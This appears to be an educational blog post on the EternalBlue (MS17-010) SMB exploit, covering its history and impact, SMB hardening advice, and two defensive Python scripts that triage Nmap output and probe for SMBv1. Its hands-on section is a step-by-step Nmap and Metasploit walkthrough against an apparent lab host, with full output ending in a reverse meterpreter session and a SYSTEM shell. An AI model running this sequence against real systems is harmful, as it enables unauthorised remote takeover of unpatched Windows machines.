EternalBlue — Windows’s Kryptonite
Overview of the EternalBlue
“The Shadow Brokers” released their fifth leak, “Lost in Translation,” on 14 April 2017; it contained the EternalBlue exploitation tool.
EternalBlue works against all versions of Windows before Windows 8. In these versions the inter-process communication share (IPC$) supports null sessions, that is, connections made via an anonymous login, and a null session is permitted by default. The server accepts a variety of commands from clients connected over a null session.
FuzzBunch, an exploitation framework built by the NSA, was a key asset in the havoc the well-known WannaCry ransomware wreaked on the world. The framework's function is to configure the exploitation tools (for instance, set the victim's IP address) and run them.
Microsoft published patches for the flaws in the leak under Microsoft Security Bulletin MS17-010.
The CVE ID in MS17-010 that corresponds to EternalBlue is CVE-2017-0144.
Impact of the Attack
The EternalBlue attack had a tremendous effect and extensively damaged many different industries. Some of the effects are as follows:
Attacks Using Ransomware: Cybercriminals used the EternalBlue exploit to spread ransomware, a type of malware that encrypts a victim's files and demands payment for the decryption key. One of the most notable ransomware operations built on EternalBlue was the WannaCry outbreak, which impacted over 200,000 machines in 150 countries.
Financial Losses: The EternalBlue attack resulted in huge financial losses. Businesses and organizations worldwide are thought to have lost over $8 billion due to the WannaCry ransomware attack alone.
Critical Infrastructure Damage: Hospitals and transport systems were among the critical-infrastructure targets of the EternalBlue attack.
Root cause and motive behind the EternalBlue
- This attack was made possible by a flaw in the Server Message Block (SMB) protocol implementation of Microsoft's Windows operating system. The flaw permitted attackers to run arbitrary code on a remote machine without any user involvement.
- The SMB protocol is used between computers to share files, printers and other resources. Because of a bug in Windows's SMB implementation, attackers could deliver specially crafted packets to the target machine and exploit a buffer overflow to run malicious code. The vulnerability was first identified by the US National Security Agency (NSA), which built the exploit as part of its cyber-espionage activities; in 2017 a hacker group known as the Shadow Brokers leaked it.
- The EternalBlue attack was primarily carried out for financial gain. The WannaCry ransomware used the EternalBlue exploit to infect and encrypt data on tens of thousands of machines worldwide and demanded payment in return for the decryption key. The perpetrators are thought to have collected millions of dollars in ransom payments.
- The attackers propagated the malware quickly and autonomously through a worm-like mechanism, infecting susceptible PCs within minutes. This let them spread the ransomware widely, resulting in extensive disruption and considerable financial losses. The perpetrators also took advantage of the fact that many businesses were still running obsolete, unpatched operating systems, which emphasizes the importance of updating software regularly, since updates frequently include vital security patches and bug fixes.
- In conclusion, the EternalBlue attack was a seriously harmful attack that used a flaw in Microsoft's Windows operating system. Since their primary motivation was financial gain, the criminals disseminated the ransomware widely using a worm-like technique. The attack brings home the need for regular software upgrades and patch management.
Hands On How To Do This Kind Of Attack
Step 1) First, we find our target's open ports and the services running on them, with their versions. For that, we use Nmap with the flags -p (scan a specified port range or a single port), -T5 (the fastest timing template) and -A (OS detection, version detection, script scanning and traceroute).
┌──(root㉿evil)-[/home/evil]
└─# nmap -p 0-1000 -T5 -A 10.10.90.73
Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-23 05:05 IST
Warning: 10.10.90.73 giving up on port because retransmission cap hit (2).
Nmap scan report for 10.10.90.73
Host is up (0.21s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
Aggressive OS guesses: Microsoft Windows 7 or Windows Server 2008 R2 (97%), Microsoft Windows Home Server 2011 (Windows Server 2008 R2) (96%), Microsoft Windows Server 2008 SP1 (96%), Microsoft Windows Server 2008 SP2 (96%), Microsoft Windows 7 (96%), Microsoft Windows 7 SP0 - SP1 or Windows Server 2008 (96%), Microsoft Windows 7 SP0 - SP1, Windows Server 2008 SP1, Windows Server 2008 R2, Windows 8, or Windows 8.1 Update 1 (96%), Microsoft Windows 7 Ultimate (96%), Microsoft Windows 8.1 (96%), Microsoft Windows 8.1 Update 1 (96%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: Host: JON-PC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: -3h49m59s, deviation: 2h53m12s, median: -5h30m00s
| smb-os-discovery:
| OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
| OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
| Computer name: Jon-PC
| NetBIOS computer name: JON-PC\x00
| Workgroup: WORKGROUP\x00
|_ System time: 2023-04-22T13:06:00-05:00
|_nbstat: NetBIOS name: JON-PC, NetBIOS user: <unknown>, NetBIOS MAC: 02e983fc6527 (unknown)
| smb2-security-mode:
| 210:
|_ Message signing enabled but not required
| smb2-time:
| date: 2023-04-22T18:06:00
|_ start_date: 2023-04-22T18:04:35
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
TRACEROUTE (using port 111/tcp)
HOP RTT ADDRESS
1 360.82 ms 10.9.0.1
2 360.76 ms 10.10.90.73
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 34.22 seconds
Step 2) After scanning the target host, we need to find the vulnerability on that host. We use Nmap again with the flags -p and --script=vuln (this runs Nmap's vulnerability-detection scripts against the services on the open ports).
┌──(root㉿evil)-[/home/evil]
└─# nmap -p 139 --script=vuln 10.10.90.73
Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-23 21:55 IST
Nmap scan report for 10.10.90.73
Host is up (0.60s latency).
PORT STATE SERVICE
139/tcp open netbios-ssn
Host script results:
|_smb-vuln-ms10-054: false
| smb-vuln-ms17-010:
| VULNERABLE:
| Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
| State: VULNERABLE
| IDs: CVE:CVE-2017-0143
| Risk factor: HIGH
| A critical remote code execution vulnerability exists in Microsoft SMBv1
| servers (ms17-010).
|
| Disclosure date: 2017-03-14
| References:
| https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
|_ https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
|_samba-vuln-cve-2012-1182: NT_STATUS_ACCESS_DENIED
|_smb-vuln-ms10-061: NT_STATUS_ACCESS_DENIED
Nmap done: 1 IP address (1 host up) scanned in 22.05 seconds
From the above scan it is clear that the target host is vulnerable. The vulnerable service is microsoft-ds, because the vulnerability concerns Microsoft SMBv1 servers (MS17-010), which are served on port 445; hence port 445 is vulnerable.
Step 3) Open msfconsole by simply typing msfconsole in the terminal. Then type search ms17-010 at the prompt.
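Reading the two scans by eye works for one host, but the same indicators can be pulled out mechanically when a defender runs the Nmap commands from Steps 1 and 2 across their own subnets. The following Python script is an added example, not code from the original post or from Nmap: it parses Nmap's host-script output (a script block starts with "| name:" or "|_name: value", its own lines are indented further, and "|_" marks the block's last line) and turns the smb-vuln-ms17-010, smb-security-mode and smb2-security-mode results into ranked findings. SAMPLE_SCAN is a constructed copy of the relevant lines from the scans above with Nmap's indentation restored; the severity labels, and the reading that any smb-security-mode result implies the host still serves SMBv1, are the example's own assumptions.

```python
import re
import sys
from dataclasses import dataclass
from typing import Dict, List, Tuple

# Constructed sample input (not a fresh capture): the lines the checks below
# look at, taken from the two Nmap runs above with Nmap's indentation restored.
SAMPLE_SCAN = """\
Nmap scan report for 10.10.90.73
PORT    STATE SERVICE      VERSION
139/tcp open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp open  microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds
Host script results:
| smb2-security-mode:
|   210:
|_    Message signing enabled but not required
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_smb-vuln-ms10-054: false
| smb-vuln-ms17-010:
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|     Risk factor: HIGH
|_samba-vuln-cve-2012-1182: NT_STATUS_ACCESS_DENIED
"""


@dataclass
class Finding:
    host: str
    severity: str  # critical / high / medium / info
    title: str
    evidence: str


HOST_LINE = re.compile(r"^Nmap scan report for (\S+)")
PORT_LINE = re.compile(r"^(\d+)/tcp\s+open\s+(\S+)")
# A script name sits at most one space after "|" or "|_"; deeper indentation
# is the script's own output.
SCRIPT_START = re.compile(r"^\|(_?) ?([a-z0-9][a-z0-9-]*):\s*(.*)$")
CVE_ID = re.compile(r"CVE-\d{4}-\d{4,}")


def parse_scan(text: str) -> Tuple[str, Dict[int, str], Dict[str, List[str]]]:
    """Return (host, open tcp port -> service, script name -> output lines)."""
    host, ports, scripts = "?", {}, {}
    current = None
    for line in text.splitlines():
        m = HOST_LINE.match(line)
        if m:
            host = m.group(1)
            continue
        m = PORT_LINE.match(line)
        if m:
            ports[int(m.group(1))] = m.group(2)
            continue
        if not line.startswith("|"):
            continue
        m = SCRIPT_START.match(line)
        if m:
            closing, current, first = m.group(1) == "_", m.group(2), m.group(3)
            scripts[current] = [first] if first else []
        elif current is not None:
            closing = line.startswith("|_")
            scripts[current].append(line.lstrip("|_ ").rstrip())
        else:
            continue
        if closing:
            current = None
    return host, ports, scripts


def assess(text: str) -> List[Finding]:
    """Turn raw scan text into prioritised findings for the scanned host."""
    host, ports, scripts = parse_scan(text)
    findings: List[Finding] = []
    smb_ports = {p: s for p, s in ports.items() if p in (139, 445)}
    if smb_ports:
        findings.append(Finding(host, "info", "SMB reachable from the scanner",
                                ", ".join(f"{p}/tcp {s}" for p, s in sorted(smb_ports.items()))))
    ms17 = scripts.get("smb-vuln-ms17-010", [])
    if any(l.startswith("State: VULNERABLE") for l in ms17):
        ids = sorted({c for l in ms17 for c in CVE_ID.findall(l)})
        findings.append(Finding(host, "critical", "MS17-010 unpatched (SMBv1 remote code execution)",
                                ", ".join(ids) or "no CVE id in script output"))
    smb1 = scripts.get("smb-security-mode")
    if smb1 is not None:
        # Assumption: smb-security-mode is answered over an SMBv1 negotiate,
        # so any result at all means the host still serves SMBv1.
        signing = next((l.split(":", 1)[1].strip() for l in smb1
                        if l.startswith("message_signing:")), "unknown")
        if signing.startswith("disabled"):
            findings.append(Finding(host, "high", "SMBv1 served with message signing disabled", signing))
        elif signing.startswith("supported"):
            findings.append(Finding(host, "medium", "SMBv1 served, signing not required", signing))
    smb2 = [l for l in scripts.get("smb2-security-mode", []) if "not required" in l]
    if smb2:
        findings.append(Finding(host, "medium", "SMBv2 message signing not required", smb2[0]))
    return findings


if __name__ == "__main__":
    # Usage: python smb_triage.py [nmap_output.txt]; without a file the sample is used.
    text = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_SCAN
    for f in assess(text):
        print(f"{f.severity:8} {f.host}  {f.title}  [{f.evidence}]")
```

Run against the sample, the host comes back with one critical finding (MS17-010, CVE-2017-0143) and a high finding for SMBv1 served without signing, which is exactly the combination the exploit in Step 4 relies on; a host that has been patched and had SMBv1 disabled produces neither.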
┌──(root㉿evil)-[/home/evil]
└─# msfconsole
=[ metasploit v6.2.23-dev ]
+ -- --=[ 2259 exploits - 1188 auxiliary - 402 post ]
+ -- --=[ 951 payloads - 45 encoders - 11 nops ]
+ -- --=[ 9 evasion ]
Metasploit tip: Enable verbose logging with set VERBOSE true
Metasploit Documentation: https://docs.metasploit.com/
msf6 > search ms17-010
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/windows/smb/ms17_010_eternalblue 2017-03-14 average Yes MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
1 exploit/windows/smb/ms17_010_psexec 2017-03-14 normal Yes MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
2 auxiliary/admin/smb/ms17_010_command 2017-03-14 normal No MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
3 auxiliary/scanner/smb/smb_ms17_010 normal No MS17-010 SMB RCE Detection
4 exploit/windows/smb/smb_doublepulsar_rce 2017-04-14 great Yes SMB DOUBLEPULSAR Remote Code Execution
Interact with a module by name or index. For example info 4, use 4 or use exploit/windows/smb/smb_doublepulsar_rce
Step 4) From the above result, option 0 is the one we are interested in, because our target machine is vulnerable to the EternalBlue exploit. Type use 0, then give the command “set RHOSTS 10.10.90.73” to set the remote host IP address, and finally the command “exploit”, which connects us to the target.
msf6 > use 0
[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS 10.10.90.73
RHOSTS => 10.10.90.73
msf6 exploit(windows/smb/ms17_010_eternalblue) > exploit
[*] Started reverse TCP handler on 10.9.70.230:4444
[*] 10.10.90.73:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 10.10.90.73:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)
[*] 10.10.90.73:445 - Scanned 1 of 1 hosts (100% complete)
[+] 10.10.90.73:445 - The target is vulnerable.
[*] 10.10.90.73:445 - Connecting to target for exploitation.
[+] 10.10.90.73:445 - Connection established for exploitation.
[+] 10.10.90.73:445 - Target OS selected valid for OS indicated by SMB reply
[*] 10.10.90.73:445 - CORE raw buffer dump (42 bytes)
[*] 10.10.90.73:445 - 0x00000000 57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73 Windows 7 Profes
[*] 10.10.90.73:445 - 0x00000010 73 69 6f 6e 61 6c 20 37 36 30 31 20 53 65 72 76 sional 7601 Serv
[*] 10.10.90.73:445 - 0x00000020 69 63 65 20 50 61 63 6b 20 31 ice Pack 1
[+] 10.10.90.73:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 10.10.90.73:445 - Trying exploit with 22 Groom Allocations.
[*] 10.10.90.73:445 - Sending all but last fragment of exploit packet
[*] 10.10.90.73:445 - Starting non-paged pool grooming
[+] 10.10.90.73:445 - Sending SMBv2 buffers
[+] 10.10.90.73:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 10.10.90.73:445 - Sending final SMBv2 buffers.
[*] 10.10.90.73:445 - Sending last fragment of exploit packet!
[*] 10.10.90.73:445 - Receiving response from exploit packet
[+] 10.10.90.73:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 10.10.90.73:445 - Sending egg to corrupted connection.
[*] 10.10.90.73:445 - Triggering free of corrupted buffer.
[*] Sending stage (200774 bytes) to 10.10.90.73
[*] Meterpreter session 1 opened (10.9.70.230:4444 -> 10.10.90.73:49182) at 2023-04-23 22:45:24 +0530
[+] 10.10.90.73:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.10.90.73:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.10.90.73:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
meterpreter > shell
Process 688 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
whoami
nt authority\system
C:\Windows\system32>hostname
hostname
Jon-PC
C:\Windows\system32>
By simply typing shell, we get a command shell on the target; in other words, we are inside the target machine.
Best Practice to Protect from Such Kind of Attack
To maintain the security of your systems and data, it is crucial to take the measures that prevent attackers from exploiting vulnerabilities in the Server Message Block (SMB) protocol. Here are some important steps to secure your SMB environment:
Update and Patch
Regularly update and patch your systems, especially those running SMB. This ensures the latest security fixes are applied and known vulnerabilities are addressed.
Block SMB at the Network Level
Consider blocking SMB at the network level so it is not reachable from the internet or other untrusted networks. This helps prevent unauthorized access and attacks by malicious actors.
Restrict and Protect SMB at the Host Level
If SMB is necessary in your environment, restrict and protect it at the host level: disable unnecessary SMB services, configure access controls and host firewalls, and apply security best practices such as strong passwords and multi-factor authentication.
Use Secure Authentication Methods for SMB
To enhance the security of your SMB environment, use secure authentication methods such as Kerberos or NTLMv2. These provide stronger authentication and are less susceptible to attacks than older, weaker methods.
Protect Data and Use Encryption for SMB
Use encryption to protect sensitive data transferred over SMB. This can be achieved by enabling SMB encryption or by tunnelling SMB traffic through a virtual private network (VPN).
By following these steps, you can help to secure your SMB environment and protect your data from potential threats.
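Whether these measures actually took hold on a given host can be verified from the network side, the same way the smb-security-mode script did in Step 1. The following Python script is an added example, not code from the original post or from any project it mentions: it sends a single SMBv1 NEGOTIATE that offers only the NT LM 0.12 dialect and reads the SecurityMode byte of the reply, so it reports whether the host still serves SMBv1 at all and whether message signing is disabled, merely enabled or required. The field layout follows MS-CIFS; constructed_response fabricates a reply for offline use and is not a capture; the hypothetical file name smb1_check.py is an assumption. It does not tell whether the MS17-010 patch is installed, which is what the smb-vuln-ms17-010 script in Step 2 checks.

```python
import socket
import struct
import sys

SMB1_MAGIC = b"\xffSMB"
SMB2_MAGIC = b"\xfeSMB"
SMB_COM_NEGOTIATE = 0x72
DIALECT = b"NT LM 0.12"  # the SMBv1 dialect that MS17-010 concerns

# SecurityMode bits in the SMBv1 NEGOTIATE response (MS-CIFS 2.2.4.52.2).
USER_LEVEL = 0x01         # user-level rather than share-level authentication
ENCRYPT_PASSWORDS = 0x02  # challenge/response instead of plaintext passwords
SIGNING_ENABLED = 0x04    # server is able to sign messages
SIGNING_REQUIRED = 0x08   # server refuses unsigned sessions

HEADER_FMT = "<4sBIBHH8sHHHHH"  # the 32-byte SMBv1 header


def _smb1_header(command: int, flags: int, flags2: int) -> bytes:
    return struct.pack(HEADER_FMT, SMB1_MAGIC, command, 0, flags, flags2,
                       0, b"\x00" * 8, 0, 0, 0xFEFF, 0, 0)


def _netbios_frame(smb: bytes) -> bytes:
    """NetBIOS session-service framing used on 445/tcp: 0x00 + 3-byte length."""
    return b"\x00" + len(smb).to_bytes(3, "big") + smb


def build_negotiate_request() -> bytes:
    """SMBv1 NEGOTIATE offering only NT LM 0.12, so a host with SMBv1 disabled
    has nothing it can accept."""
    dialects = b"\x02" + DIALECT + b"\x00"
    body = bytes([0]) + struct.pack("<H", len(dialects)) + dialects  # WordCount 0, ByteCount, list
    # Flags 0x18: canonical paths, case-insensitive. Flags2 0xC001: Unicode, NT
    # status codes, long names; no extended security, so the classic
    # challenge/domain response layout comes back.
    return _netbios_frame(_smb1_header(SMB_COM_NEGOTIATE, 0x18, 0xC001) + body)


def interpret_response(data: bytes) -> dict:
    """Classify the raw reply to build_negotiate_request()."""
    if len(data) < 4:
        return {"smbv1": False, "reason": "no reply: server dropped or ignored the SMBv1 negotiate"}
    smb = data[4:4 + int.from_bytes(data[1:4], "big")]
    if smb[:4] == SMB2_MAGIC:
        return {"smbv1": False, "reason": "server answered with SMB2 only"}
    if smb[:4] != SMB1_MAGIC or len(smb) < 33 or smb[4] != SMB_COM_NEGOTIATE:
        return {"smbv1": False, "reason": "reply is not an SMBv1 NEGOTIATE response"}
    status = struct.unpack_from("<I", smb, 5)[0]
    word_count = smb[32]
    if status != 0 or word_count != 17 or len(smb) < 33 + 34:
        return {"smbv1": False, "reason": f"negotiate failed (status 0x{status:08x}, WordCount {word_count})"}
    dialect_index, mode = struct.unpack_from("<HB", smb, 33)
    if dialect_index == 0xFFFF:
        return {"smbv1": False, "reason": "server accepted none of the offered dialects"}
    if mode & SIGNING_REQUIRED:
        signing = "required"
    elif mode & SIGNING_ENABLED:
        signing = "supported"  # enabled but not required
    else:
        signing = "disabled"
    return {
        "smbv1": True,
        "security_mode": mode,
        "authentication_level": "user" if mode & USER_LEVEL else "share",
        "challenge_response": "supported" if mode & ENCRYPT_PASSWORDS else "plaintext",
        "message_signing": signing,
    }


def probe(host: str, port: int = 445, timeout: float = 5.0) -> dict:
    """Send one NEGOTIATE to host:port and interpret whatever comes back."""
    try:
        with socket.create_connection((host, port), timeout=timeout) as sock:
            sock.sendall(build_negotiate_request())
            try:
                data = sock.recv(4096)
            except (socket.timeout, ConnectionResetError):
                data = b""
    except OSError as exc:
        return {"smbv1": False, "reason": f"connect failed: {exc}"}
    return interpret_response(data)


def constructed_response(security_mode: int) -> bytes:
    """A constructed (not captured) NEGOTIATE response in the classic
    challenge/domain layout, for exercising the parser offline."""
    challenge = bytes(range(8))
    domain = "WORKGROUP".encode("utf-16-le") + b"\x00\x00"
    params = struct.pack("<HBHHIIIIqhB", 0, security_mode, 50, 1, 16644, 65536,
                         0, 0x8000E3FD, 0, 330, len(challenge))
    body = bytes([17]) + params + struct.pack("<H", len(challenge) + len(domain)) + challenge + domain
    return _netbios_frame(_smb1_header(SMB_COM_NEGOTIATE, 0x98, 0xC001) + body)


if __name__ == "__main__":
    # Usage: python smb1_check.py <host>. Without a host, the constructed reply
    # with SecurityMode 0x03 (what the smb-security-mode output above describes:
    # user-level, challenge/response, signing disabled) is parsed instead.
    print(probe(sys.argv[1]) if len(sys.argv) > 1 else interpret_response(constructed_response(0x03)))
```

After disabling SMBv1 and requiring signing, a hardened host should come back either as smbv1 False (the negotiate is dropped or answered with SMB2 only) or with message_signing required; a SecurityMode of 0x03, as on the Windows 7 host above, means both measures are still missing.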
Similar Kind of Attack
It’s June 2017, just a month after WannaCry wreaked havoc. Along comes NotPetya, the cool kid on the block, also known as ExPetr or Petya. NotPetya is like the rebellious teenager of ransomware, using the EternalBlue exploit and its partner in crime, EternalRomance, to spread across networks like a wildfire at a bonfire party. Talk about crashing the Windows party scene!
But wait, there’s more! In October 2017, another troublemaker shows up — Bad Rabbit. It’s like the mischievous sibling of NotPetya, using the same EternalRomance exploit to pull off its ransom attack. But instead of tempting victims with a flashy dance move, Bad Rabbit poses as a fake Adobe Flash update, sneaky little rascal! It’s all fun and games until your files end up encrypted like a secret code only a hacker can crack.
And then there’s Emotet, the OG of banking Trojans, who has been causing mayhem since 2014. Emotet is like the cunning thief who knows all the tricks of the trade, including using EternalBlue to spread through phishing emails and malicious attachments. It’s like the smooth operator of the cybercrime world, making its way into systems with a slick charm that would make James Bond jealous.
So there you have it — a cyber attack party featuring NotPetya, Bad Rabbit, and Emotet, all using similar techniques like EternalBlue to crash the system and have their malicious fun. It’s like a wild ride straight out of a hacker movie, complete with exploits, vulnerabilities, and ransomware shenanigans. Stay updated, keep your defenses strong, and watch out for these cyber troublemakers, folks! Cue hacker movie soundtrack.
Contribution
Writers:-
Akshay Raj | Sudoer
Mehul Dadlani | Binary
Nasir Hussain | Binary
Gurupreet Singh | Binary
Khushi Tiwari | Binary
Nawnit Singh | Binary
Designers:-
Abhinav Shandilya | Sudoer
Omar Ansari | Sticky Bit